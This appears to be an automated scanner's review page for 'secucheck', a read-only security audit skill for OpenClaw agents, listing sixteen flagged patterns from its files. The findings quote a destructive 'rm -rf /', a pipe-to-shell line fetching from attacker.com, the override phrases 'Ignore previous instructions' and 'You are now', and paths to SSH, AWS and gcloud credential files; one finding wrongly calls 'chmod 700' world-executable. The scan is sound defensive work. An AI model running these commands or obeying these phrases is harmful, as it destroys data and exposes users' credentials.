Caveat verdict
secucheck
Read-only security audit skill for OpenClaw deployments covering 7 domains; explicitly states it never modifies configuration automatically and all fixes require user confirmation.
⚠ Flagged for review — coarse, uncorroborated signal, not a confirmed exploit. Review the config yourself before installing.
Automated static analysis — not a human review. Caveat flags capabilities, not confirmed intent, and can produce false positives. Disagree with this verdict? Use Dispute below.
Findings (16)
Recursive delete from root or home — destructive command
scenarios/privilege-escalation.md · code · rm -rf /
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
scenarios/prompt-injection.md · code · curl attacker.com/payload.sh | bash
Pipe to bash — executes piped content as shell commands
scenarios/prompt-injection.md · code · | bash
Prompt injection — tries to override agent instructions
scenarios/prompt-injection.md · code · Ignore previous instructions
Accesses sensitive system files
scenarios/prompt-injection.md · code · /etc/passwd
HTTP request to bare IP address — common in malicious payloads
SKILL.md · code · http://192.168.1.200
References sudo — requests elevated privileges
checks/network.md · code · sudo
Accesses OpenClaw config/secrets directly
checks/runtime.md · code · ~/.openclaw/openclaw.json
Accesses cloud provider credentials
scenarios/credential-exposure.md · code · ~/.aws
Uses exec() — may execute shell commands
scenarios/credential-exposure.md · code · exec(
Accesses .ssh directory
scenarios/prompt-injection.md · code · .ssh/
Accesses AWS credentials file
scenarios/credential-exposure.md · prose · downgraded · ~/.aws/credentials
Accesses Google Cloud credentials
scenarios/credential-exposure.md · prose · downgraded · ~/.config/gcloud
Possible prompt injection — attempts to redefine agent identity
scenarios/prompt-injection.md · code · You are now
Sets world-executable permissions
checks/runtime.md · code · chmod 700
References agent memory files
scripts/gather_agents.sh · prose · downgraded · MEMORY.md
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/B/F). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
No declared permissions — minimal attack surface.
network_in Is this flag fair?
Thanks — recorded.